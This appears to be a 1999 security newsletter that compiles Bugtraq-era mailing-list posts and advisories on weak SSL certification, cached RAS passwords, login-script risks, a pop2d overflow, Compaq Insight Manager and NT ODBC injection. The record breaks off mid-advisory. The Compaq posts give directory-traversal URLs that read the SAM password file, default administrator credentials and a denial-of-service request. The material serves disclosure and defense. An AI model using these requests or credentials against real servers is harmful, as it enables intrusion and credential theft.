browse to http://www.trusecure.net/ and either go to the library or click the "contact us" link. ICSA helps customers address risks across multiple categories (physical, hacking, malicious code, spoofing, eavesdropping, lack of knowledge/awareness, lack of trust, DoS, privacy-user by site & data subject, lack of interoperability). We developed a methodology to focus on high risk/cost categories and follow this methodology with our customers. When addressing the issue of privacy, ICSA approaches the matter by addressing the risk of capturing customer information across the wire and as it resides on the customers server. We do require the use of encryption but choose to let the customer to decide the level based on the assets they are protecting, the impact to their business, and the fact that the real concern is the data residing on the server un-encrypted. ICSA therefore works with our customers to set up multiple layers of synergistic controls that not only address the use of encryption but also those mentioned above. We rely on addressing our customers' issues not only from a technology perspective, but from a business level one as well. When deploying security, ICSA will always address how technology impacts our customers operations and costs. At 07:31 PM 5/27/99 -0400, Adam Shostack wrote: >Do you require certified sites post their security policy? If not, >how do I know that the policy doesn't explicitly accept the presense >of phf in /cgi-bin? Would it be possible to have that in my policy >and still get certified, if I have good business reasons for putting >it in place? > For the purposes of site certification we would not certify a site with phf in the cgi-bin directory. Our criteria do restrict this. However, we have customers who have purchased TruSecure but have "good business reasons" for ignoring or violating one or more of our criteria. ICSA has a process to review these occurrences and have withheld certification from some of these customers. Indeed, we have customers who are quite satisfied with their TruSecure purchase without achieving certification. Without turning into a sales/marketing droid, we try to emphasize TruSecure as a process to provide acceptable security to the customer; many customers are satisfied without completing certification and know this before their purchase. >This flap may be a result of certifying compliance to policy, but the >relying parties on your mark should not be expected to be able to read >and understand those policies; they should be able to rely on your >mark to say that the policies make sense. Incidentally, do you >require sites to post these policies to which you certify compliance? > Certified sites must post a privacy and user data security policy as part of our criteria. We do not require the site to post their security policy. Most enterprises would be reluctant to post an un-santitized version of their security policies which opens the question of how much sanitization is necessary or desirable. I don't believe it would be wise to require they post the nitty gritty details of their policies. One would not want details such as these widely known: Inbound telnet is blocked except from IP xxx.xxx.xxx.xxx to yyy.yyy.yyy.yyy which is permitted so Y Inc can review progress reports on Project Z. Employees assigned to our office in Sri Lanka will use PPTP to host at zzz.zzz.zzz.zzz to access the company intranet. At 07:36 PM 5/27/99 -0400, Russ wrote: >However, the bottom line is that; > >- They are *NOT* employing "sophisticated encryption", they're employing >the least sophisticated deployable. > I can't respond to this directly. >- They also say ICSA "examined every aspect of our security >precautions", but in fact, you only examined those aspects defined in >their policies. For any customer, we examine every aspect defined by *our* criteria, which includes examining their security policies and implementations, but these two aspects are but a handful of the 200+ criteria we include in TruSecure. > >- They also claim that because of your certification, their customers >"know ConsumerInfo.Com's security measures are state-of-the-art" when in >fact their *NOT*. This issue is with the semantics on a page not maintained by ICSA. > >I will not, at this time, question the integrity of ICSA. Nor will I >suggest that ConsumerInfo.Com is out and out lying. > >I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com >to mislead their customers via the ICSA Web Certification approval. By >ICSA not being permitted, by NDA, to discuss certification they have >performed, it renders, IMNSHO, the certification itself *worthless*. It >would appear that ConsumerInfo.Com has been allowed to say anything they >want about their work with ICSA and, by NDA, ICSA cannot rebuke it. > The way this paragraph is constructed makes it impossible to respond to it. We would like to respond, and explain how certification is not as you say, "worthless," but to do so would be to reveal confidential information about a customer. At 07:36 PM 5/27/99 -0400, Lucky Green wrote: > >Now I am really getting worried. From your post it is clear that you, a >representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a >server you by no means prevent users limited to 40 bit crypto from accessing >it. > Incorrect, we understand this fact. Again, the criteria require encryption and protocols acceptable to both the host and the client. Popular browsers provide the capability for users to click on an icon and determine the encryption being used, if any. Undoubtedly that's how this thread started. -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 iQCVAwUBN07+V/GfiIQsciJtAQECrgQA3IsyfP6AEWV4OarIG5xs46sIWP/IdSYQ sWvEYaENjbFdyu8tOH2hq5y1bm9/ALM8nITz94zYs/kZupJ2XZR5GYFhOpyfbG2v 4qzL1pml8Ht2aKsJ+r6Ghf9cp2qOfCejigSWcHTfRLNhgoI2u1CL6G6ua3OkDBS8 5KVOeNhwDK0= =GqTy -----END PGP SIGNATURE----- Regards, David Kennedy CISSP Director of Research Services, ICSA Inc. http://www.icsa.net Using encryption on the Internet is the equivalent of arranging an armored car to deliver credit-card information from someone living in a cardboard box to someone living on a park bench. Gene Spafford ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 20:08:35 -0600 (MDT) From: cult hero To: InfoSec News Subject: Re: [ISN] ICSA certifies weak crypto as secure Reply From: edison A few thoughts on the subject. First, with the frightening amount of completely unsecured consumer info sites on (and off) the net today, I would disagree that ICSA's actions reflect "very badly" on our industry. Because there are much easier targets, consumerinfo.com can be resonably certain that it won't even be attacked for quite some time. At least until most of the rest of the sites are secure in the same fashion. Don't get me wrong, I'm not advocating 40-bit encryption as 'secure,' but it is 'more secure' than nothing at all. And until the ingorant IT managers with sites on the net clue in, this kind of certification won't _hurt_ our industry. Please don't attack me - I'm just saying that while we professionals might recognize weaknesses in this level of security, those outside don't and "we" still look good to them. Second, if you've every been to a hacker BBS/site, you have to know that getting into Equifax or any other reporting agency is pitifully easy. If you think 40-bit encryption is weak, how about a 2 character alphanumeric "password" on accounts that can be pulled from your own credit report? And for that matter, there are posted algorithms to the account scheme, so you can even generate your own. I will agree that there are more unsavory characters on the net than there are people aware of CBI dialups. But then again, 40-bit crypto is not exactly _easy_ to crack. -edison On Fri, 28 May 1999, cult hero wrote: > I am becoming concerned about the apparent lack of professional competence > within even well-known segments of the security community. I hope the > incident I discovered is an isolated one, but even a single such incident > is disquieting. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 48.0 RAS and RRAS vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 27 May 1999 17:18:25 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com] discovered a vulnerability involving both RAS and RRAS. This was subsequently reported in Heise Online, a German publication; http://www.heise.de/newsticker/data/cp-12.04.99-000/ http://www.heise.de/newsticker/data/hos-15.04.99-000/ Dieter originally reported it via some "product improvement suggestion" web form on www.microsoft.de back in March. Together we informed Microsoft Security (secure@microsoft.com) back in April. By default the registry key is only accessible to Administrator and the user/owner of the passwords, but it represents a potential threat and a location of password information which would not otherwise be expected. See; http://www.microsoft.com/security/bulletins/ms99-017.asp for the complete write up including fix locations. There are two KB articles about this (one for RAS, and another for RRAS). They were not yet available at the time of writing. RAS http://support.microsoft.com/support/kb/articles/q230/6/81.asp RRAS http://support.microsoft.com/support/kb/articles/q233/3/03.asp Cheers, Russ - NTBugtraq Editor ------------------------------------------------------------------------------- Date: Thu, 27 May 1999 15:14:46 -0700 From: aleph1@UNDERGROUND.ORG To: BUGTRAQ@netspace.org Subject: Microsoft Security Bulletin (MS99-017) The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-017) -------------------------------------- Patch Available for "RAS and RRAS Password" Vulnerability Originally Posted: May 27, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in the Microsoft (r) Windows NT (r) Remote Access Service (RAS) and Routing and Remote Access Service (RRAS) clients, in which a user's password is cached even if the user de-selects the "Save password" option. Issue ===== When the client software for Microsoft RAS or RRAS is used to dial into a server, a dialogue requests the user's userid and password for the server. On the same dialogue is a checkbox whose caption reads "Save password" and which is intended to provide the user with the option to cache their security credentials if desired. However, the implemented client functionality actually caches the user's credentials regardless of whether the checkbox is selected or de-selected. Cached security credentials, which include the password, are stored in the registry and protected by ACLs whose default values authorize only local administrators and the user to access them. Windows NT 4.0 Service Pack 4 also provides the ability to strongly encrypts the password data stored in the registry using the SYSKEY feature. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing a patch that restores correct functionality to the password caching function. The patch should be applied to all machines that are used as RAS or RRAS clients. It is important to note that RRAS servers also can be used as RRAS clients, and any machines used in such a capacity should have the patch applied as well. Affected Software Versions ========================== - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0, Enterprise Edition What Microsoft is Doing ======================= Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q230681, RAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q230/6/81.asp - Microsoft Knowledge Base (KB) article Q233303, RRAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q233/3/03.asp (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Microsoft highly recommends that customers evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at: - RAS: ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/ - RRAS: ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/ (Note: The URLs above have been wrapped for readability) More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-017, Patch Available for "RAS and RRAS Password Caching" Vulnerability, (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-017.asp. - Microsoft Knowledge Base (KB) article Q230681, RAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q230/6/81.asp. - Microsoft Knowledge Base (KB) article Q233303, RRAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q233/3/03.asp Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Revisions ========= - May 27, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security ---------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. ------------------------------------------------------------------------------- Date: Fri, 28 May 1999 07:59:35 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords Wow, talk about goofing up. Eric Schultze correctly pointed out that he, together with Lisa O'Connor, Martin Dolphin, and Joe Greene reported this problem with RAS originally way back on March 19th, 1998 <-- (note, 1998, not 1999). See the original message at; http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9803&L=ntbu gtraq&F=P&S=&P=4209 (URL is wrapped). I, most inappropriately, credited another with the discovery in March of this year. Its funny, when David LeBlanc first prompted me about this "discovery" this year, I could have sworn I'd seen it before but I failed to check my own archives...tsk tsk...;-] So, to Lisa, Martin, Joe, and Eric, please accept my humble apologies! To Microsoft, why the hell did it take a publication in a German magazine to provoke you to fix something that had been reported here a full year before?? Could it have been the fact that the 3/99 publication included an exploit tool? Maybe we need to have an exploit coding group at NTBugtraq that produces a tool for everything reported and distributes said tool to all and sunder? Cheers, Russ - NTBugtraq Editor @HWA 49.0 Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Seen via PacketStorm, scarfed from : http://doxpara.netpedia.net/login.html Insecurity By Design: The Unforseen Consequences of Login Scripts By Dan Kaminsky A common aspect of most client-server network designs is the login script. A set of commands executed upon provision of correct username and password, the login script provides the means for corporate system administrators to centrally manage their flock of clients. Unfortunately what´s seemingly good for the business turns out to be a disastrous security hole in the University environment, where students logging into the network from their dorm rooms now find the network logging into them. This hole provides a single, uniform point of access to any number of previously uncompromised clients, and is a severe liability that must be dealt with with the highest urgency. Even those in the corporate environment should take note of their uncomfortable exposure and demand a number of security procedures described herein to protect their networks. One possible solution for some may be the DoxPrint system designed by this author; it allows users to print to Novell Print Queues over the Network Neighborhood without requiring any Novell code on the client. Affected universities should consider switching to systems that do not require full logins, until more stable and secure systems are available. What if I told you that every time you turned on your computer, the government could control exactly what would load? What if, every time you entered your username and password, your ISP gained the ability to specify exactly what software should load, what files to send, maybe even what data to erase? What if, merely by accessing a web page, your system came under the full control of the page's author, or more accurately any possible author of that page, authorized or not? In each case, the security violation is quite obvious. Merely drawing electricity, connecting to the Internet, or accessing a web page does not constitute an open license to fully control a computer. In legal terms, each action by the user is an ongoing communication under contractural obligations--for example, the user agrees to pay a fee and provide authentication material in the form of username and password, and in return the ISP agrees to provide Internet access. Never does the user agree to a "remote root access contract"! Whether this access is, in fact, used or abused is irrelevant. None of the user's actions constitutes acceptance of "handing over the keys of the computer" to an external agent. Of course, sometimes the issue of what, exactly, the term "user" means becomes muddled. In a corporate environment, the user of the computing environment is not necessarily its owner, nor is he or she the highest authority regarding what should or shouldn't run on the machine. Login scripts, composed of lists of commands to be executed on the client machines upon the correct provision of username and password, provide a means for the central administrators of corporate computers to automatically connect to network drives and printers. They also allow the administrators to load any software they choose upon the client computers as if the user himself had run it. Anything from Censorware to remote control software is within the power of the administrator to load. This freedom to centrally manage systems is extremely powerful. Some would argue that it's an intrinsic capability of any client-server architecture that claims to be "ready for the enterprise", as the prospect of physically handling each client machine is extraordinarily expensive in terms of funds and manpower. With every major client-server networking architecture automatically executing the commands contained within login scripts *by default*, it would appear that networking engineers are serving the perceived requirements of the corporate mentality quite well. Small problem: University dorm networks aren't corporate. The authentication procedures built into Windows NT Domains and Novell Netware are often used by Universities as a means for controlling access to file and print resources. Both the University and the student are in an advanced version of an Internet Service contract, but it's an ISP contract nonetheless. The user(student) agrees to pay a fee(tuition) and provide authentication material in the form of username and password, and in return the ISP(University) agrees to provide access to network resources. Unfortunately, to provide access to file and print resources, Windows(the predominate computing environment on the desktop) cannot generally delay the login procedure until the time of actual usage. Indeed, just as in the corporate world, the system is presumed to be the property of the institution and the student/employee must thus authenticate him or herself upon startup of the machine. Also, just as in the corporate world, the system will by default execute any commands the system administrators have deemed appropriate. The school does not own the hardware, nor does it own the operating system running upon it. Even if it did both, it would not own the data on those systems; students do not generally relinquish ownership of their own labor to their educational institution. It is of the highest inappropriateness, then, that University Information Technology departments receive full access to that which is plainly not theirs. It's not their faults, really. They just want to track use and prevent abuse of pseudo-public resources. The only way to do this lies with the corporate authentication mechanisms within Netware and NT Domains. That the default setting in both environments is to load any login script provided is the fault of their respective designers, not of the accidental victims in IT. Ironically, not a bug but a long standing design decision is responsible for what is likely the greatest single computer security vulnerability at many universities. Saying that Login Scripts--something which, for so long, have been considered as innocuous as an ugly background--are indeed such a powerfully damaging technology is a strong statement that needs to be backed up. Login Scripts are so dangerous because they eliminate the most effective element of the security design behind Windows 95 and Windows 98: Security Through Impossibility. By default, Windows runs almost no services. You can't telnet in, you can't view the screen remotely, and there is no sendmail or ftp server with buffers to overflow. The only common service run is the infamous NetBIOS. The result of this restrictive environment is interesting: While it's not particularly difficult to remotely crash a 95/98 machine, it's surprisingly hard to remotely compromise this erstwhile insecure operating system without at least some interaction from the user. It's the difference between a locked door and a brick wall. Some arguably overzealous administrators will use this facet of security to ban any and all services not explicitly authorized(by an Act of God, usually). This can be excessive, and often prevents significant educational and productivity benefits. It's not that services are necessarily worrisome so much as the universal deployment of identically insecure services with significant value compromisable by unauthorized access--dedicated servers, unfortunately, have a tendancy to fit very nicely into this category. Sysadmins understand well that since both their servers are at risk and downtime is expensive, it is necessary to have recent backups of servers at all times. Sometimes, client desktops are also backed up. But, in an educational institution, it is grossly improper for the university to have copies of student/client data. Worse, as most computers ship with no system-scale tape backup, very few students are able to back up their data. This means that gigabytes of student data are protected only by the security built into their operating system. This actually isn´t too awful--no default remote access has its advantages--until the login scripts are compromised. Since the login scripts reside on servers that in general are never considered fully secure by nature of the services they run, and which are further targeted due to the high value gained by a successful penetration, we see the heretofore impossible compromisation of every single networked Windows station nearly simultaneously as being only a matter of changing a few commands in a login script. Crack one server, and you crack a thousand clients whose only "crime" was stating their identity. That's one tough lesson. Sadly, some university administrators have responded to this observed threat by claiming that 1) they'd never maliciously enter anything into the login scripts and 2) they're pretty much the only ones with access to the login scripts, so "nothing would ever happen." If there was ever a set of famous last words for a system administrator, these would be them. They've got the keys to systems they don't own, and it's probable that their users don't even know it. Their intentions are irrelevant; they're not generally the ones to worry about. As I told one admin, "It's not you I distrust. It's your computer. Maybe you'll accidentally share the wrong directory. Maybe you´ll be forwarded to a web site that will use a backdoor to initiate a remote LANMAN authentication. Perhaps a 95/98 machine you logged into as Administrator for the domain will have its .PWL files cracked. Or maybe somebody will sneak in in the middle of the night and install a keylogger. With one hack providing access to *everybody*'s machine, it's worth it for a cracker to attack; isn't it worth it for you to defend?" If this is making sysadmins in the corporate sector nervous...it should. Yes, the downside to centralized management is indeed single point of massive failure. More than ever, businesses are just one disgruntled system adminstrator away from a task-scheduled mass virus infection--or worse. While indeed there are methods for disabling the loading of login scripts, their all-or-nothing nature makes them unrealistic in many environments. Businesses should not need to choose between tremendous risk and necessary functionality. Microsoft and Novell need to implement the following functionality in their login script code: 1) Script Capabiltiies. Login scripts allow drives to be mounted, printers to be connected, applications to be loaded from remote drives, and so on. System administrators need the ability to specify exactly which commands a client machine should honor. This provides a barrier to abuse--a site that only uses login scripts to mount network drives should be able to restrict clients to the degree of functionality the site requires. There are going to be issues, of course, with executable code on remote drives. To address this, we require... 2) Data Signatures. Cryptographic signatures on executable content, most commonly used by Microsoft's Authenticode system, provide a means for insecure systems to verify the appropriateness of remotely executed code. Sysadmins should be able to "sign" login scripts, as well as commonly executed remote code, and then specify that unless the client detects a signature from a "trusted" list, the content should be considered unauthorized. Sysadmins should also be able to sign actual executables(and maybe even data files) as acceptable for remote execution. 3) Executable hash checking. A slightly different tact might be to have clients cache hash values of specific files commonly run. Given a change from one session to another in the file hash, a trap could be sent to the administrator noting him or her that a system breach may have occurred. It´s one thing to replace the contents of a file, but it´s another to have to operate against the memory of every client that accessed the old file. This is a useful way to flip the disadvantage of large numbers of dumb machines into an advantage of intelligent agents with configurable responses to non-matching hashes. Of course, the ultimate solution to this issue is to emulate a an alternate login paradigm that Win95/98 implements to some degree. As Russ Cooper, editor of NTBugTraq, writes: There is *no need* for a client machine (be it Win9x or NT) to logon in to a domain in a way that would invoke a login script in order to gain access to its resources. You log into the machine itself (the client machine), and then connect to the resource and supply a userID and password. This will establish the connection, without invoking the login script. Bingo, problem solved, no? Novell and many other systems need to emulate this usage paradigm post-haste, and institutions still using full Domain logins must cease as soon as possible. Universities should consider implementing systems that do not require any form of login procedure for the user to access his or her own computer. The reasoning for this is a matter of ownership--what right does a university have to deny a user access to his or her own computer? Password security is notoriously bad anyway, and is far too insecure for any degree of non-repudiability. I´m working on a solution for switched hubs involving using MAC Caches to allow trustable two-way communication traces. Those who insist upon using login procedures need to be disable them immediately for dorm-room computers. Students who need to connect to specific shares should be given a batch script to load--this will, incidentally, eliminate nasty situations where login scripts appropriate for one environment(say, the capturing of LPT1 to a printer port) are completely inappropriate in another(say, when that same user is in their dorm room). For those administrators running Novell Netware all the way to your student´s desktop, I implore you to evaluate DoxPrint. DoxPrint allows sysadmins to enjoy most of the advantages of running Netware servers on the backend while sparing Windows clients the hardship of installing and maintaining the Novell client code. All access occurs over the Network Neighborhood, and is quite flexible in its programmability and authentication. It´s been tested and proven as a powerful solution to some of the problems Netware creates. It´s a strange thing, that such a common function would turn out so open for abuse. System designers who create new functionality need to include security considerations at every phase of the design process. Any time network access to a system is introduced, there is a significant burden of functionality upon the system to verify that the actions executed on behalf of the remote agent are appropriate. Failure to meet this burden is technical irresponsibility and must be prevented at all costs. I am immensely curious as to the reactions of Microsoft, Novell, and any other administrator who is reading this now. Please, send me your opinions; I´ll publish the best of the replies. @HWA 50.0 Vulnerability in pop2.imap ~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 20:37:13 +0100 From: Chris Evans To: BUGTRAQ@netspace.org Subject: Remote vulnerability in pop2d Hi Firstly, sorry if any details are hazy - this is from memory (it's two months since I last looked at this). This bug concerns the pop-2 daemon, which is a part of the Washington University imap package. I've been waiting for a CERT advisory, but one doesn't seem to be forthcoming. Two and a half months is a long time. Also, the problem has been fixed for a long time. I'm posting because a) A fixed full release is available, so people should know about it b) The flaw is fairly basic and easy to spot, so active exploitation could well be happening Quick details ============= Compromise possible: remote users can get a shell as user "nobody" If: runing pop-2d v4.4 or earlier Fixed version: imap-4.5, available now. Not vulnerable ============== RedHat-6.0 isn't vulnerable because imap-4.5 was shipped. Vulnerable ========== Anyone who shipped the pop-2 component of imap-4.4 or earlier, including earlier RedHat releases Details of flaw =============== pop-2 and pop-3 support the concept of an "anonymous proxy" whereby remote users can connect and open an imap mailbox on _any server they have a valid account on_. An attacker connects to the vulnerable pop-2 port and connects it to an imap server under their control. Once logged on, issuing a "FOLD" command with a long arg will cause an overflow of a stack based buffer. The arg to FOLD must be somewhere around 1000 bytes - not much bigger, not much smaller. Look at the source. Additional ========== I think the concept of "anonymous proxy" is just fundamentally insecure. It opens up a large code path for remote usrs to explore, i.e. the protocol parsing of imap, etc. The author of imap very responsibly includes a compile time flag to disable this in 4.5. Better still, RedHat-6.0 ships with the proxy disabled. Cheers Chris @HWA 51.0 Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 26 May 1999 16:41:36 +0100 From: gabriel.sandberg@INFOSEC.SE To: BUGTRAQ@netspace.org Subject: Infosec.19990526.compaq-im.a Infosec Security Vulnerability Report No: Infosec.19990526.compaq-im.a ===================================== Vulnerability Summary --------------------- Problem: The web server included in Compaq Insight Manager could expose sensitive information. Threat: Anyone that have access to port 2301 where Compaq Insight Manager is installed could get unrestricted access to the servers disk through the "root dot dot" bug. Platform: Detected on Windows NT and Novell Netware servers running on Compaq hardware. Solution: Disable the Compaq Insight Manager web server or restrict anonymous access. Vulnerability Description ------------------------- When installing Compaq Insight Manager a web server gets installed. This web server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This bug gives unrestricted access to the vulnerable server?s disk. It could easily get exploited with one of the URLs: http://vulnerable-NT.com:2301/../../../winnt/repair/sam._ http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf (How many dots there should be is install-dependent) Solution -------- You could probably fix the problem by restricting anonymous access to the Compaq Insight Manager web server. If you are not using the web server, Infosec recommends disabling the service. Background ---------- Infosec gives the credits to Master Dogen who first reported the problem (Windows NT and Compaq Insight Manager) to us and wanted us go public with a vulnerability report. Infosec have found that Novell Netware with Compaq Insight Manager have the same problem but is not as common as on Windows NT. Compaq Sweden was informed about this problem april 26, 1999. //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se ------------------------------------------------------------------------------ Date: Wed, 26 May 1999 16:13:19 -0500 From: Vacuum To: BUGTRAQ@netspace.org Subject: Re: Infosec.19990526.compaq-im.a Please disgregard previous post, the signature got in the way of a paste In addition to //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se's findings. Web-Based Management is enabled, by default, when you install the Compaq Server Management Agents for Windows NT.(CPQWMGMT.EXE) The web-enabled Compaq Server Management Agents allow you to view subsystem and status information from a web browser, either locally or remotely. Web-enabled Service Management Agents are availible in all 4.x versions of Insight Manager. Compaq HTTP Server Version 1.2.15 (Pre-Release) The only user accounts available in the Compaq Server Management Agent WEBEM release are listed below. http://111.111.111.111:2301/cpqlogin.htm account anonymous username anonymous password account user username user password public account operator username operator password operator account administrator username administrator password administrator http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes is the url used to change the password. Unfortunately the password is the only information that can be changed and is stored in clear text in the following file. c:\compaq\wbem\cpqhmmd.acl ------------------------------------------------------------------------------------- Compaq-WBEM-AclFile, 1.1 anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F login in progress... login in progress... 7A21DD9917C0C23907267FC07DBC7D12 administrator administrator D6022D9B3FCA717CCEED36E640160478 51B02137D6BF719FC62F4940DBE1F3E6 operator operator B5CE548356D1BEA5F1CFEE12FE9502C3 041D1015AEC9F60412C7F86E62D6672C user user EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A Once you have found one wbem enabled machine, using compaq's HTTP Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm It is trivial to locate other machines. ------------------------------------------------------------------------------ Date: Thu, 27 May 1999 21:43:09 -0500 From: Vacuum To: BUGTRAQ@netspace.org Subject: Re: Infosec.19990526.compaq-im.a (New DoS and correction to my previous post) Upon further research, I must retract my earlier statement that the Compaq Insight Manager Web Agent's passwords are stored in clear text. Infact, what we see in cpqhmmd.acl are the account name and username in clear text NOT the password. Explanation of username and password combinations mentioned in my previous post. c:\compaq\wbem\cpqhmmd.acl or http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl cpqhmmd.acl contents: Compaq-WBEM-AclFile, 1.1 anonymousanonymous737EEEFA7617ED94EDD74E659B83035F login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12 administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0 operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A The default usernames and password combinations that I mentioned in my previous post are still valid. Once again these are the defaults: account: anonymous username: anonymous password: account: user username: user password: public account: operator username: operator password: operator account: administrator username: administrator password: administrator There are three types of data: Default(read only), Sets(read/write), and Reboot(read/write). The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory specifies the level of user that has access to data . The "read=" and "write=" entries in the file set the user accounts required for access, where: 0 = No access, 1 = Anonymous, 2 = User, 3 = Operator, and 4 = Administrator. Changing these entries changes the security. The web-enabled Server Agent service must be stopped and restarted for any changes to take effect. Do not modify anything except the read/write levels. New Denial of service: Just to make this post somewhat worthwile. http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the minimum) The first time this occurs, an application error occurs in surveyor.exe Exception: access violation (0xc0000005), Address: 0x100333e5 If you restart the Insight Web Agent Service and repeat it will cause an application error in cpqwmget.exe Exception: access violation(0xc0000005), Address 0x002486d4 The http://111.111.111.111 will no longer respond until the service is stopped and restarted. Apologies for my previous error. vac ------------------------------------------------------------------------------ Date: Fri, 28 May 1999 08:54:10 -0400 From: Ricky Mitchell To: BUGTRAQ@netspace.org Subject: second compaq insight manager vulnerablilty Greetings, Yesterday while I was removing the "web insight agent" service from the our vulnerable NT servers, I noticed on some machines that port 2301 was still vulnerable. To completely remove the problem, make sure you also stop the "surveryor" service as well if you have that installed. That will completely shut off access to port 2301 and plug the hole. Regards, Rick Mitchell NT administrator Columbia Gas Transmission Corp @HWA 52.0 Advisory: NT ODBC Remote Compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 25 May 1999 13:59:30 -0500 From: .rain.forest.puppy. To: BUGTRAQ@netspace.org Subject: Advisory: NT ODBC Remote Compromise --[ Advisory: NT ODBC Remote Compromise --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net --[ Brief Summary MS Jet database engine (which runs Access databases) allows an individual to embed VBA in string expressions, which may allow the individual to run commandline NT commands. This, combined with the flaw of IIS running ODBC commands as system_local allow a remote attacker to have full control of the system. Other webservers may be affected. Many MS Jet engines are affected, but may not lead to elevated priviledges. --[ Background ODBC allows a program flexible access to one or more relational databases using SQL. If a client fails to quote correctly the meta characters in a piece of data used in an SQL query, an attacker may be able to interfere with the tables in the database (see MS SQL appension 'feature' in Phrack 54, article 8). However, the Microsoft "Jet" database engine (aka MS Access) provides some extensions to SQL which allow the execution of VBA (Visual Basic for Applications). This makes holes in meta character quoting code much more interesting and dangerous. --[ What form does the hole take? In SQL, strings must be enclosed in single quotes. If a string includes a single quote it must be escaped by doubling it up. The Jet engine extends this by allowing strings to enclose a VBA expression inside vertical 